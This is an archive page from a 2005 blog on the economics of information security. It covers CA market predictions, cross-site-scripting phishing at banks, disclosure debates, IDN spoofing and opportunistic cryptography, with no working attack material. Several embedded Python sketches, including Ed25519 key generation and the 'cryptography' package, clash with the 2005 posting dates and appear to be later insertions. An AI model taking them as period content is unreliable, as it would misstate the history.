    The prosecution filed an indirect damages claim of $5.9 million but the chances of that being inflated for effect are high. Against that, the guy was already in the pokey for some other cracks, and he boasted to his buddies about his exploits.

    For that he got 4 years. This is hardly proportional, and the unintended consequence of putting the fear of God and the Federal Penitentiary into systems administrators is likely to be lower overall security: you can "do it by the book," or you can have security, but you can't have both.

    Posted by iang at 05:11 PM | Comments (0) | TrackBack

    March 18, 2005

    Christopher Allen on the constancy of Fear

    We don't often get the chance to do the Rip van Winkle experience, and this makes Christopher Allen's essay on how he returned to the security and crypto field after exiting it in 1999 quite interesting.

    He identifies two things that are in common: Fear and Gadgets. Both are still present in buckets, and this is a worry, says Christopher. On Fear:

    "To simplify, as long as the risks were unknown, we were in a business feeding off of 'fear' and our security industry 'pie' was growing. But as we and our customers both understand the risks better, and as we get better at mitigating those risks cheaply, this "fear" shrinks and thus the entire 'pie' of the security industry becomes smaller. Yes, new 'threats' keep on coming: denial-of-service, worms, spam, etc., but businesses understanding of past risks make them believe that these new risks can be solved and commodified in the same way."

    The observation that fear fed on the unknown risks is certainly not a surprise. But I find the conclusion - that as the risks became better understood, the pie shrank - a real eye opener. It's certainly correlated, but it misses out a world of causality: fear is and was the pie, and now the pie buyers are jaded.

    I've written elsewhere on what's wrong with the security industry, and I disagree with Christopher's assumptions, but we both end up with the same question (and with a nod to Adam's question): how indeed to sell a viable real security product into a market where, statistically, we are probably selling FUD?

    Addendum: Adam's signalling thread: from Adam: 1, 2. From Iang: 1, 2

    Posted by iang at 11:39 AM | Comments (2) | TrackBack

    March 16, 2005

    Observations on the CA market - Verisign to sell out?

    fm points at developments in the anti-phishing battle (extracted below), only unexpected if you had not read an earlier entry on the Crooked Black Claw.

    It seems that Netcraft are having some success in aggregating the information collected from their toolbar community into an early warning system showing where phishers are heading. Reportage from them: online banking is being attacked by cross-site scripting. This is distinct from traditional phishing in that it does now bring the bank and ecommerce site (note to Niham!) into the loop. Yet only in a small way; close that loophole and the bank is out of the defence business again.

    Yet more important is the structural shift being signalled here.

    Netcraft pushed out their toolbar back in the closing days of 2004. Now they can use this info, a scant 10 weeks later. This changes the balance of power in cert-based security, and CAs will be further marginalised by this development. Here's the article, followed by more observations:

    Online Banking Industry Very Vulnerable to Cross-Site Scripting Frauds

    Phishing Attacks reported by members of the Netcraft Toolbar
    community show that many large banks are neglecting to take
    sufficient care with the development and testing of their online
    banking facilities.

    Well known banks have created an infestation of application bugs and
    vulnerabilities across the Internet, allowing fraudsters to insert
    their data collection forms into bona fide banking sites, creating
    convincing frauds that are undetectable to most customers. Indeed, a
    personal finance journalist writing for The Motley Fool was brave
    enough to publicly admit to having fallen for a fraud running on
    Suntrust's site and having her current account cleaned out. It's a
    reasonable premise that if a Motley Fool journalist can fall for a
    fraud, anyone can.

    One fraud recently blocked by the Netcraft Toolbar was at Citizens
    Bank. Fraudsters composed and mass mailed a phishing mail which
    exploited a program on CitizensBank.com, loading Javascript from the
    attackers' server hosted at Telecom Italia. Customers were presented
    with a page bearing the CitizensBank.com URL in the address bar,
    while the browser window displays a form from the Telecom Italia
    server asking for user login information.

    The script being exploited allows visitors to search for Citizens
    Bank branch offices in their town. Along with search scripts, branch
    locator pages are frequently carelessly coded and are targets for
    fraudsters who are actively analyzing financial web sites for
    weaknesses.

    Another thought occurred to me. I wrote last night in Mozilla's bug fix forum "There is no centralised database of certs by which a CA can know whether an application for a new cert is likely to conflict (paraphrased)." This is because CAs do not cooperate and will never cooperate at that level (as customer theft will be the obvious result).

    This balkanisation of CAs means that any security fixups must align with those borders. An attack on an ecommerce site using certs will come via another CA. If I was to attack GMail, I wouldn't go to Equifax for my cert, I'd go to Comodo. Or VeriSign, or some other... (And yes, I'd ask for GMall.com and present my forged paperwork for that company. But let's skip over the boring details of how we trick a CA.)

    So it is crucial that the browser shows which CA signed the cert. Along with other things as suggested here by Peter Gutmann, in a discussion on how to detect and discriminate rogue CAs, a priori:

    In other words, this problem [of differentiating between "high" assurance and "low" assurance] is way, way up in the political layer, and I can't see any way of resolving it. It'd certainly be a good idea to make some distinction, but it's not a productive area to apply effort. It'd be better to look at some of the work on secure UI design (e.g. anything by Ka-Ping Yee, Simpson Garfinkel's thesis, etc etc). Work on the stuff that's solveable and leave this one as a honeynet for the bureaucrats to prevent them from causing any damage elsewhere.

    Two other bits that I should mention:

    That will do more for security than any certificate-nitpicking ever will (the anti-phishing list at Gerv's site should be adopted as the #1 - #5 security features to be added to Mozilla/Firefox). After you've implemented those, you can still work on the titanium-plated kryptonite certificate support. Conversely, no amount of diamond-studded iridium certificates will do you any good without anti-phishing/spoofing measures like the above being used.

    Peter.


    If there is a God of Cryptoplumbing, then Peter Gutmann is he, and he has spoken. We now seem to be on our way to a manifesto of ideas. Perhaps we should take that further...

    Getting back to the crucial point here, I claimed there was no centralised database. But, it turns out that there is a database - the net. Sure, it ain't centralised, but (and here's the clanger) it is trawled on a daily basis for certs. By two parties at least that I know of: Netcraft and SecuritySpace. And as a consequence both of these parties have (implied) centralised databases, and have an ability to answer the question "is this new application for a cert likely to be a phishing attack?"
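    To see what answering that question might look like in code, here's a toy sketch, with a made-up list standing in for the crawled data (no real Netcraft or SecuritySpace interface is implied):

        from difflib import SequenceMatcher

        def flag_application(new_domain, crawled_certs):
            """Flag a cert application whose domain is confusably close
            to a domain already holding a cert in the crawl."""
            suspects = []
            for known in crawled_certs:
                if new_domain == known:
                    continue
                # crude similarity; a real checker would also compare
                # registrable labels and handle homoglyph substitutions
                if SequenceMatcher(None, new_domain, known).ratio() > 0.85:
                    suspects.append(known)
            return suspects

        # flag_application("gmall.com", ["gmail.com", "example.org"])
        # -> ["gmail.com"] - exactly the forged-paperwork scenario above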

    Now, if you are a net techie, the observation above will likely seem puerile. But if you are the CEO of a Certificate Authority, then the ground just rumbled under your feet. If these two players can pull this off, then the CA just got so marginalised that the commoditisation we've seen with Comodo and GoDaddy, and also with CACert but in a different direction ... well, all that falls into the class of "you ain't seen nothing yet!"

    Which leads me to my final observation. (Techie warning: what follows is all bizspeak, sorry about that.) As CAs are inevitably marginalised by the above development, and by their failure to protect the net from the rise of phishing - a direct MITM on the browser - the big bucks players will rethink their strategy. That of course means Verisign.

    There are two possible paths here. Path One is that the branding opportunities turn up in time (watch Microsoft here) for the CA business to reverse its fortunes and become a media space player. In this scenario, players spend on advertising, and start to build their brands as quality and security (which means they take a proactive approach to watching applications for certs). But they can only do this if a) the branding turns up, b) they can get more investment, and thus c) they can show a massive market increase, and thus d) the commodity certificate leads to a discriminated market place of much greater size.

    That's not as far off as we think, as part a) also leads to part d) in market terms.

    Then there is Path Two. Phishing gets bigger, and some poor Alice in the US loses her house over it. Her attorneys say "this can't go on and we can help you stop it!" (Proving that the USA leads in genetic engineering, their attorneys lack any capability to say "I don't know / I can't help you.")

    Boom, a class action suit on phishing is filed against the bank, the browser manufacturer, the cert suppliers (both, or all) and, to cap things off, the people who designed the system. The potential class size is about 1 million Americans, give or take. Total losses are in the billions, over a few years. Add punitive damages if it goes badly and the case shows that the architects should have known better.

    Potential payout is from 100m to 10b, depending. So it is big enough to encourage salivation, but it's also big enough to break any but the bank players (who themselves are just victims so they aren't likely to lie down and die) and Microsoft.

    Now, cast all these ingredients into the pot and what do you have? The cards just got totally reshuffled on the CA business. Which means that the biggest player, Verisign, will have the biggest problem. This is compounded (should I say exponentiated?) by several issues:

    Against that we have an uncertain and never fully monetarised synergy from certs, domains, NetDiscovery and lots of other "strategic control" businesses under the umbrella.

    To me, this says one thing: Verisign will sell the CA business. They will do it to limit the damages from future litigation, and because the ground is shifting too fast for their complex business to benefit from it. Further, CAs as "strategic controls" are being marginalised. It's no longer core, and it's darn risky.

    That's my call! Analysts charge top dollar for this - what's your bet?

    Posted by iang at 01:03 PM | Comments (2) | TrackBack

    March 15, 2005

    More Pennies

    Stefan posted a bunch of materials on a phone based ecash system.

    On Identity theft, America's cartoonists are striking back. Click here and then send me your credit card number....

    On the HCI thread of how users view web security, Chris points out that "Simson Garfinkel's dissertation is worth looking at in this context." This relates to the earlier two papers on what users think on web security.

    Scott reports ``Visa International has published a white paper titled "Financial Flows and Supply Chain Efficiency" (sorry, in PDF) authored by Professor Warren H. Hausman of Stanford University.'' It's interesting if somewhat self-serving, and feeds into the whole message is the payment thread.

    Stefan via Adam pointed me to a new blog on risks called Not Bad For a Cubicle. I shall pretend to know what that means, especially as the blogger in question claims knowledge of FC ... but meanwhile, the author takes issue with the persistent but poor usage of the word security, where 'risks' should be preferred. This makes a lot of sense. Maybe I should change all uses of the word over?

    Because it's more secure becomes ... because it's less risky! Nice. But, wait! That would mean I'd have to change the name of my new paper over to Pareto-risk-free ... Hmm, let's think about this some more.

    Posted by iang at 02:06 AM | Comments (0) | TrackBack

    March 13, 2005

    What users think about web security

    A security model generally includes the human in the loop; totally automated security models are generally disruptable. As we move into our new era of persistent attacks on web browsers, research on human failure is very useful. Ping points to two papers done around 2001 on what web browsing security means to users.

    Users' Conceptions of Web Security (by Friedman, Hurley, Howe, Felten, Nissenbaum) explored how users treat the browser's security display. Unsurprisingly, non-technical users showed poor recognition of spoof pages, based on the presence of a false padlock/key icon. Perhaps more surprisingly, users derived a different view of security: they interpreted security as meaning it was safe to put their information in. Worse, they tended to derive this as much from the presence of a form as from the padlock:

    "That at least has the indication of a secure connection; I mean, it's obviously asking for a social security number and a password."

    Which is clearly wrong. But consider the distance between what is correct - the web security model protects the information on the wire - and what it is that is relevant to the user. For the user, they want to keep their information safe from harm, any harm, and they will assume that any signal sent will be to that end.

    But as the threat to information is almost entirely at the end node, and not on the wire, users are faced with an odd choice: interpret the signal according to the harms they know about, which is wrong, or ignore the signal because it is irrelevant to the harms. Which is unexpected.

    It is therefore understandable that users misinterpret the signals they are given.

    The second paper, Users' Conceptions of Risks and Harms on the Web (by Friedman, Nissenbaum, Hurley, Howe, Felten), is also worth reading, but it was conducted in a period of relative peace. It would be very interesting to see the same study conducted again, now that we are in a state of perpetual attack.

    Posted by iang at 10:56 AM | Comments (6) | TrackBack

    March 10, 2005

    Tegam uses courts to signal bad security

    In the ongoing thread of Adam's question - how do we signal good security - it's important to also list signals of bad security. CoCo writes that Tegam, a French anti-virus maker, has secured a conviction against a security researcher for reverse engineering and publishing weaknesses.

    This seems to be a signal that Tegam has bad security. If they had good security, then why would they care what a security researcher said? They could just show him to be wrong. Or fix it.

    There are two other possibilities. Firstly, Tegam has bad security, and they know it. This is the most likely, and their aggressive focus on preserving the revenue base would perhaps lead them to prefer suppression of future research into the product. CoCo points to a claim that Tegam accused the researcher of being a terrorist in a French advertisement, which indicates an attempt to disguise the suppression and validate it in the minds of their buying public. It's in French, and Google translates it into quixotic English. Tegam responds that this article makes their case, but comments by flacks do no such thing. However, the response makes for interesting reading and may balance their case.

    Alternatively (secondly), they just don't know. And I don't think we need to spell out the proof that "don't know" is equivalent to "insecure."

    CoCo also comments on how the chilling effect will raise insecurity in general. But if enough companies decline to pursue avenues of prosecution, this might balance out in our favour: we might then end up with a new signal of those that prosecute and those that do not.

    Texas Instruments recently signalled desire for good security in the RFID breach, as well as an understanding of the risks to the user. Tegam has signalled the reverse. Are they saying that their product has known weaknesses, and they wish to hide these from the users? You be the judge, and while you're at it, ponder on which side of this fence your own company sits?

    Posted by iang at 06:35 AM | Comments (1) | TrackBack

    March 04, 2005

    NSA gets data mined - not the right crowd to steal a payment system from

    I'm jacking into the net in some random office in downtown Vienna, and I'm introduced to the payment-system-in-a-jar. Paper and tokens and IOUs thrown in a big vase serve to manage coordination, on an office-wide scale, of coffee, beer and juice. For my talk on community currencies I thought this would make a great example of a payment system on a local basis, so I lifted the entire thing, and carried the 40cm high jar - money, tokens, and paper included - to the presentation.

    This payment system (as I presented) can be stolen. It can be broken. Nice, good Internet ones don't have that problem. It was a nice example, it worked, and my audience enjoyed the huge jar of purloined coffee money. But as I walked back to the office I wondered whether they'd mind me purloining their payment system.

    I needn't have worried. There was a party in progress, the local technical community was in a happy mood. As I pulled the huge jar out of my laptop bag, luckily unbroken, there were smiles and laughter, and I had to explain what I wanted it for.

    And then, as I was explaining, I detected a complete lack of interest... with Austrian lingo and one word sneaking through repeatedly: NSA. After some confusion, I found out that I was at the post-success party of the group that had just data mined the NSA.

    How this happened was gathered in scattered conversations slipped between explanations of payment systems and crypto cert systems. People had signed up for a semi-secret mailing list, and when the archives were put online, they'd been downloaded. Now they're up online in some fashion, and there is discussion on what to do next. The next phases were explained ... but in some sense this was subject to change, so I'll skip that part.

    It looks like the NSA made a few mistakes in the migration of internal forums to external availability. That's not a bad thing in itself, but they left a lot of internal stuff in the archives. Also, it looks to me like the stories being discussed are really a bad use of secrecy - the sort of political manoeuvring that was discovered on the lists should not have been secret, but subject to public review. It is, after all, the money of the taxpayer that is being abused in this debate.

    The one story I did hear was a bureaucratic fight among the FBI, NSA and the Brits over who gets to set the biometrics standard. According to the mail list, the FBI's systems are based on fingerprints, so they want that. The NSA loves voice recognition, so that's their baby. But the Brits are all hot on iris recognition, and they have the worldwide patent.

    Good one guys - this is the sort of debate that really needs to be conducted in the open, not under secrecy. We follow with interest, and now, I must go use the local payment system again to mine some more beers.

    Posted by iang at 08:01 PM | Comments (1) | TrackBack

    February 24, 2005

    Microsoft's negative rep leads to startling new security strategy

    Triage is one thing, security is another. Last week's ground-shifting news was widely ignored in the press. Scanning a bunch of links, the closest I found to any acknowledgement of what Microsoft announced is this:

    In announcing the plan, Gates acknowledged something that many outside the company had been arguing for some time--that the browser itself has become a security risk. "Browsing is definitely a point of vulnerability," Gates said.

    Yet no discussion of what that actually meant. Still, to his sole credit, author Steven Musil admitted he didn't follow what Microsoft were up to. The rest of the media speculated on compatibility, Firefox as a competitor, and Microsoft's pay-me-don't-pay-me plans for anti-virus services, which I guess is easier to understand as there are competitors who can explain how they're not scared.

    So what does this mean? Microsoft has zero, zip, nada credibility in security.

    ...earlier this week the chairman of the World's Most Important Software Company looked an auditorium full of IT security professionals in the eye and solemnly assured them that "security is the most important thing we're doing."

    And this time he really means it.

    That, of course, is the problem: IT pros have heard this from Bill Gates and Microsoft many times before ...

    Whatever they say is not only discounted, it's even reversed in the minds of the press. Even when they get one right, it is assumed there must have been another reason! The above article goes on to say:

    Indeed, it's no accident that Microsoft is mounting another security PR blitz now, for the company is trying to reverse the steady loss of IE's browser market share to Mozilla's Firefox 1.0.

    Microsoft is now the proud owner of a negative reputation in security.

    Which leads to the following strategy: actions, not words. Every word said from now until the problem is solved will just generate wheel spinning for no productivity, at a minimum (and notwithstanding Gartner's need to sell those same words on). The only way that Microsoft can change their reputation for insecurity is to actually change their product to be secure. And then be patient.

    Microsoft should shut up and do some security. Which isn't entirely impossible. If it is a browser v. browser question, it is not as if the competition has an insurmountable lead in security. Yes, Firefox has a reputation for security, but showing that objectively is difficult: their brand is indistinguishable from "hasn't got a large enough market share to be worth attacking as yet."

    Some agree:

    "This is a work in progress," Wilcox says. "The best thing for Microsoft to do is simply not talk about what it's going to do with the browser."

    Posted by iang at 11:08 AM | Comments (2) | TrackBack

    February 19, 2005

    IEEE's Economics of Information Security

    IEEE Security & Privacy magazine has a special on _Economics of Information Security_ this month. Best bet is to simply read the editor's intro.


    There are two on the economics of disclosure, a theme touched upon recently:

  • Eric Rescorla's article "Is Finding Security Holes a Good Idea?" argues that because large modern software products such as Windows contain many security bugs, removing an individual bug makes little difference to the likelihood that an attacker will find exploits later in a product's life....
  • Ashish Arora and Rahul Telang argue for openness in "Economics of Software Vulnerability Disclosure." Their thesis is that software vulnerability disclosure policies should, in some cases, be more aggressive to push vendors into investing more in patch management.

    Two I've selected for later reading are:

  • In "Privacy and Rationality in Individual Decision Making," Ales­sandro Acquisti and Jens Grossklags use consumer psychology tools to investigate why users' stated privacy preferences differ from their behaviors.
  • In "Toward Econometric Models of the Security Risk from Remote Attacks," Stuart Schechter discusses the problems of trying to model network attacks in the same way that economists interested in crime build economic models of housebreaking. Many of the variables concerning computer or system security risk are hard to pin down,and change rapidly. For example, an analysis of attackers' incentives and costs comes up against the difficulty of assessing products' security strengths. A market for security vulnerability information might bring some clarity here.

    This is because they speak to a current theme - how to model information in attacks.

    Posted by iang at 04:07 PM | Comments (0) | TrackBack
    February 15, 2005

    Plans for Scams

    Gervase Markham has written "a plan for scams," a series of steps for different module owners to start defending. First up, the browser, and the list will be fairly agreeable to FCers: Make everything SSL, create a history of access by SSL, notify when on a new site! I like the addition of a heuristics bar (note that Thunderbird already does this).

    Meanwhile, the Mozilla Foundation has decided to pull IDNs - the internationalised domain names that were victimised by the Shmoo exploit. How they reached this decision wasn't clear, as it was taken on insiders' lists, and minutes aren't released (I was informed). But Gervase announced the decision on his blog and the security group, and the responses ran hot.

    I don't care about IDNs - that's just me - but apparently some do. Axel points to Paul Hoffman, an author of IDN, who pointed out that he had balanced solutions to IDN spoofing. Like him, I'm more interested in the process, and I'm also thinking of the big security risks to come, and the meta-risks. IDN is a storm in a teacup, as it is no real risk beyond what we already have (and no, the digits 0,1 in domains have not been turned off).
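    For reference, the class of balanced check being argued about is easy enough to sketch - a hypothetical mixed-script test in Python, not Mozilla's fix nor Hoffman's actual proposal:

        import unicodedata

        def mixed_script(label: str) -> bool:
            """Flag a domain label mixing Latin with lookalike scripts -
            the Shmoo trick put a Cyrillic 'a' inside an ASCII name."""
            scripts = set()
            for ch in label:
                name = unicodedata.name(ch, "")
                for script in ("LATIN", "CYRILLIC", "GREEK"):
                    if name.startswith(script):
                        scripts.add(script)
            return len(scripts) > 1

        # mixed_script("p\u0430ypal") -> True: U+0430 is the Cyrillic lookalike
        # mixed_script("paypal")      -> False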

    Referring this back to Frank Hecker's essay on the foundation of a disclosure policy does not help, because the disclosure was already done in this case. But at the end he talks about how disclosure arguments fell into three classes:

  • Literacy: “What are the words?”
  • Numeracy: “What are the numbers?”
  • Ecolacy: “And then what?”
  • "To that end [Frank suggests] to those studying the “economics of disclosure” that we also have to study the “politics of disclosure” and the “ecology of disclosure” as well."

    Food for thought! On a final note, a new development has occurred in certs: a CA in Europe has issued certs with the critical bit set. What this means is that if the software does not (nominally) have the code to deal with that extension, the cert is meant to be rejected. And Mozilla's crypto module follows the letter of the RFC in this.
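    In code terms the letter-of-the-RFC rule is simple. A sketch, using Python's cryptography package purely for illustration (Mozilla's actual module is NSS, in C):

        from cryptography import x509
        from cryptography.x509.oid import ExtensionOID

        RECOGNISED = {ExtensionOID.BASIC_CONSTRAINTS,
                      ExtensionOID.KEY_USAGE,
                      ExtensionOID.SUBJECT_ALTERNATIVE_NAME}

        def accept_cert(cert: x509.Certificate) -> bool:
            """RFC rule: an unrecognised extension may be ignored only if
            non-critical; marked critical, it must sink the whole cert."""
            for ext in cert.extensions:
                if ext.critical and ext.oid not in RECOGNISED:
                    return False   # Mozilla's reading; IE and Opera press on
            return True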

    IE and Opera do not, it seems (see #17 in bugzilla), and I'd have to say they have good arguments for rejecting the RFC and not the cert. Too long to go into tonight, but think of the crit ("critical bit") as an option on a future attack. Also, think of the game play that can go on. We shall see; and coincidentally, this leads straight back into phishing, because it is asking the browser to ... display stuff about the cert to the user!

    What stuff? In this case, the value of the liability in Euros. Now, you can't get more FC than that - it drags in about 6 layers of our stack, which leaves me with a real problem allocating a category to this post!

    Posted by iang at 10:05 PM | Comments (0) | TrackBack

    Disclosure - "no stupid embargos" says Linus

    The Linux community just set up a new way to report security bugs. In the debate, it transpires that Linus Torvalds laid down a firm position of "no delay on fix disclosures." Having had a look at some security systems lately, I'm inclined to agree. It may be that delays make sense to let vendors catch up. That's the reason most quoted, and it makes entirely logical sense. But that's not what happens.

    The process then gets hijacked for other agendas, and security gets obscured. Thinking about it, I'm now viewing the notion of security being discussed behind closed doors with some suspicion; it's just not clear how security by obscure committees divides its time between "ignoring the squeaky wheels" and "creating space to fix the bugs." I've sent messages on important security issues to several closed security groups in the last 6 months, and universally they've been ignored.

    So, zero days disclosure is my current benchmark. Don't like it? Use a closed product. Especially considering that 90% of the actual implementations out there never get patched in any useful time anyway...

    Posted by iang at 11:01 AM | Comments (1) | TrackBack

    The Weakest Link

    Bruce Schneier reports on the principle of the weakest link:

    To paraphrase Adi, "[security] is bypassed, not attacked."

    Posted by iang at 10:24 AM | Comments (2) | TrackBack

    February 14, 2005

    Full disclosure: for and against

    How to address Internet security in an open source world is a simmering topic. Frank Hecker has documented his view of the Mozilla Full Disclosure debate that led to their current security policy. He makes the point that the parties are different: with open source there are many vendors, which complicates the notion of disclosure. Further, the bug fixers can be anyone, following the many eyeballs theory. This then devolves into a search for a policy where anyone can be an insider; Mozilla's current policy is the result, and we are very fortunate to have the story recorded.

    Meanwhile, Adam points at an attempt by Microsoft to slow down open disclosure of exploits. In this case they are attacking the release of source code for an exploit; Adam responds that this is perhaps more in the interests of defenders than attackers. My view: it looks less dramatic if treated as gameplay by Microsoft. The short-term end goal is to get the patches out there, and Microsoft have succumbed to the easy blame opportunity to create a sense of urgency.

    (Thread: Towards an Economic Analysis of Disclosure and papers listed there, additional costs, and consumer's adjusting risk profile.)

    Posted by iang at 06:46 AM | Comments (0) | TrackBack

    February 11, 2005

    Top 18 Security Papers - add "the 3 laws of security"

    Adam found a "top 18 security papers" list. My suggestion is to add Adi Shamir's recent Turing Award Lecture to the list. I recorded the important slides here, and at least once a week I find myself copying one or other of the components from it for posting somewhere on the net. And I'm writing an entire paper on just one line...

    Adam reports the list is already up to 28; perhaps what the list keeper needs is some sort of market-determined mechanism. Perhaps every security blog could trackback to their top 3 selections, and thus create a voting circle? (Hmmm, scanning the list, I see some that I wouldn't vote for, so how about some negative votes as well?)

    To be fair, I'm not sure I've read any of them, which either augurs badly for me or badly for the list :-) Which brings up another point. If someone is going to promote some paper or other, far*&%$ake put the URL of the HTML up there... If it ain't in HTML it can't reach an audience, and it can't then be in any top 18. So there! That's it from me this week.

    Posted by iang at 03:14 PM | Comments (3) | TrackBack

    January 27, 2005

    Unintended Consequences and the Case of the $100 Superbill

    Axel points to a rather good article on Unintended Consequences, with lots of good examples for the security thinker. If there is one cause that one had to put one's finger on, it is this: the attacker is smart, and can be expected to think about how to attack your system. Once you think like an attacker, you have a chance. If not, forget it.

    Notwithstanding that minor omission, here's the rather nice FC example, that of the mysterious $100 superbills.

    Back in the 1970s, long before the revolution that would eventually topple him from power, the Shah of Iran was one of America's best friends (he was a dictator who brutally repressed his people, but he was anti-communist, and that made him OK in our book). Wanting to help out a good friend, the United States government agreed to sell Iran the very same intaglio presses used to print American currency so that the Shah could print his own high quality money for his country. Soon enough, the Shah was the proud owner of some of the best money printing machines in the world, and beautiful Iranian Rials proceeded to flow off the presses.
    All things must come to an end, and the Shah was forced to flee Iran in 1979 when the Ayatollah Khomeini's rebellion brought theocratic rule to Iran. Everyone reading this undoubtedly knows the terrible events that followed: students took American embassy workers hostage for over a year as Iran declared America to be the "Great Satan," while evidence of US complicity in the Shah's oppression of his people became obvious, leading to a break in relations between the two countries that continues to worsen to this day.
    During the early 90s, counterfeit $100 bills began to flood the Mideast, eventually spreading around the world. Known as "superbills" or "superdollars" by the US Treasury due to the astounding quality of the forgeries, these $100 bills became a tremendous headache not only for the US and its economy, but also for people all over the world that depend on the surety of American money. Several culprits have been suggested as responsible for the superbills, including North Korea and Syria, but many observers think the real culprit is the most obvious suspect: an Iranian government deeply hostile to the United States ... and even worse, an Iranian government possessing the very same printing presses used to create American money.
    If you've ever wondered just why American currency was redesigned in the 1990s, now you know. In the 1970s, the US rewarded an ally with a special machine; in the 1990s, the US had to change its money because that ally was no longer an ally, and that special machine was now a weapon used to attack the US's money supply, where it really hurts. As an example of the law of unintended consequences, it's powerful, and it illustrates one of the main results of that law: that those unintended consequences can really bite back when you least expect them.

    Read the rest... Unintended Consequences.

    Posted by iang at 09:11 AM | Comments (2) | TrackBack

    The Green Shoots of Opportunistic Cryptography

    In a New Scientist article, the mainstream popular press is starting to take notice that the big Wi-Fi standards have awful crypto. But there are some signs that the remedy is being pondered - I'll go out on a limb and predict that within a year, opportunistic cryptography will be all the rage. (links: 1, 2, 3, 4, 5)

    (Quick explanation - opportunistic cryptography is where you generate what you need to talk to the other party on the fly, and don't accept any assumptions that it isn't good enough. That is, you take on a small risk of a theoretical attack up front, in order to reach cryptographic security quickly and cheaply. The alternate, no-risk cryptography, has failed as a model because its expense means people don't deploy it. Hence, it may be no-risk, but it also doesn't deliver security.)

    Here's what has been seen in the article:

    Security experts say that the solution lies in educating people about the risks involved in going wireless, and making the software to protect them easier to use. "Blaming the consumer is wrong. Computers are too complex for the average person to secure. It's the fault of the network, the operating system and the software vendors," says California-based cryptographer Bruce Schneier in the US. "Products need to be secure out of the box," he says.

    Skipping the contradiction between "educating people" and "blaming the consumer", it is encouraging to see security people pushing for "secure out of the box." Keys should be generated opportunistically and on install - the SSH model (an SSH blog?). If more is wanted, then the expert can arrange that, but there is little point in asking an average user to go through that process. They won't.
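    Here's what "generated opportunistically and on install" amounts to in practice - a minimal sketch assuming Python's cryptography package and a made-up application path:

        import os
        from cryptography.hazmat.primitives import serialization
        from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

        KEYFILE = os.path.expanduser("~/.myapp/key.pem")   # hypothetical path

        def ensure_key():
            """Secure out of the box: if no key exists yet, silently make
            one. The user is never asked; an expert can swap it out later."""
            if os.path.exists(KEYFILE):
                with open(KEYFILE, "rb") as f:
                    return serialization.load_pem_private_key(f.read(), password=None)
            key = Ed25519PrivateKey.generate()
            os.makedirs(os.path.dirname(KEYFILE), exist_ok=True)
            with open(KEYFILE, "wb") as f:
                f.write(key.private_bytes(
                    encoding=serialization.Encoding.PEM,
                    format=serialization.PrivateFormat.PKCS8,
                    encryption_algorithm=serialization.NoEncryption()))
            return key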

    Schneier is pessimistic. "When convenience and features are in opposition to security, security generally loses. As wireless networks become more common, security will get worse."

    Schneier is unduly pessimistic. The mistake in the above logic is to treat the opposition between convenience and security as an inviolable assumption. The devil is in those assumptions, and as Modadugu and Rescorla said recently:

    "Considering the complexity of modern security protocols and the current state of proof techniques, it is rarely possible to completely prove the security of a protocol without making at least some unrealistic assumptions about the attack model."

    (Apologies, but it's buried in a PDF. Post.) That's a green shoot, right there! Adi Shamir says that absolutely secure systems do not exist, so as soon as we get over that false assumption that we can arrange things perfectly, we can start to work out what benefits us most, in an imperfect world.

    There's no reason why security and convenience can't walk hand in hand. In the 90s, security was miscast as needing to be perfect regardless of convenience. This simply resulted in lost sales and thus much less security. Better to think of security as what we can offer in alignment with convenience - how much security can we deliver for our convenience dollar? A lot, as it turns out.

    Posted by iang at 07:02 AM | Comments (15) | TrackBack

    January 25, 2005

    Do security breaches drop the share value?

    According to those that think WiKID thoughts, yes. Quoting a paper by Campbell et al., a measurable 5% drop in stock price follows a breach of confidentiality. Adam demurs, thinking the market is unconcerned about the breach of confidentiality itself, and is instead concerned about a) loss of customers or b) lawsuits.

    I demur over both! I don't think the market cares about any of those things.

    In this case, I think the market is responding to the unknown. In other words, fear. It has long been observed that once a cost is understood, it becomes factored in, and I guess that's what is happening with DDOS and defacements/viruses/worms. But large scale breaches of confidentiality are a new thing. Previously buried, they are now surfaced, and are new and scary to the market.

    And the California law makes them even scarier, forcing the companies into the unknown of future litigation. But, I think once these attacks have run their course in the public mind, they will stop causing any market reaction. That isn't to say that the attacks stop, or the breaches in confidentiality stop, but the market will be so used to them that they will be ignored.

    Otherwise I have a problem with a 5% drop in value. How is it that confidentiality is worth 5% of a company? If that were the case, companies like DigiCash and Zero-Knowledge would have scored big time, but we know they didn't. Confidentiality just isn't worth that much, ITMO (in the market's opinion).

    The full details:

    "The economic cost of publicly announced information security breaches: empirical evidence from the stock market," Katherine Campbell, Lawrence A. Gordon, Martin P. Loeb and Lei Zhou Accounting and Information Assurance, Robert H. Smith School of Business, University of Maryland, 2003.

    Abstract: This study examines the economic effect of information security breaches reported in newspapers on publicly traded US corporations. We find limited evidence of an overall negative stock market reaction to public announcements of information security breaches. However, further investigation reveals that the nature of the breach affects this result. We find a highly significant negative market reaction for information security breaches involving unauthorized access to confidential data, but no significant reaction when the breach does not involve confidential information. Thus, stock market participants appear to discriminate across types of breaches when assessing their economic impact on affected firms. These findings are consistent with the argument that the economic consequences of information security breaches vary according to the nature of the underlying assets affected by the breach.
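    For the non-economists, the mechanics behind a number like "5%" are a standard event study - roughly as in this toy sketch (the figures are invented, not the paper's data):

        import numpy as np

        def cumulative_abnormal_return(stock_returns, market_returns, beta=1.0):
            """Abnormal return = actual daily return minus what the market
            model predicted; summed over the event window round the breach."""
            stock = np.asarray(stock_returns)
            market = np.asarray(market_returns)
            return float((stock - beta * market).sum())

        # three trading days around a hypothetical breach announcement:
        car = cumulative_abnormal_return([-0.031, -0.022, 0.004],
                                         [ 0.002, -0.001, 0.003])
        print(f"CAR over the event window: {car:.1%}")   # about -5%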

    Also over on Ross Anderson's Econ & Security page there are these:

    Two papers, "Economic Consequences of Sharing Security Information" (by Esther Gal-Or and Anindya Ghose) and "An Economics Perspective on the Sharing of Information Related to Security Breaches" (by Larry Gordon), analyse the incentives that firms have to share information on security breaches within the context of the ISACs set up recently by the US government. Theoretical tools developed to model trade associations and research joint ventures can be applied to work out optimal membership fees and other incentives. There are interesting results on the type of firms that benefit, and questions as to whether the associations act as social planners or joint profit maximisers.

    Which leads to "How Much Security is Enough to Stop a Thief?," Stuart Schechter and Michael Smith, FC03 .

    Posted by iang at 02:00 PM | Comments (0) | TrackBack

    Thunderbird Gains Phishing Detection (Too)

    Through a long chain of blogs (evidence that users care about phishing at least: gemal.dk, MozIne, LWN, Addict) comes news that Thunderbird is also to have click-thru protection. The hero of the day is one Scott MacGregor. Easiest just to read his bug report and gfx:

    Thunderbird phishing warnings

    Get a phishing detector going for Thunderbird. I'm sure it can be improved quite a bit but this starts to catch some of the more obvious scams.

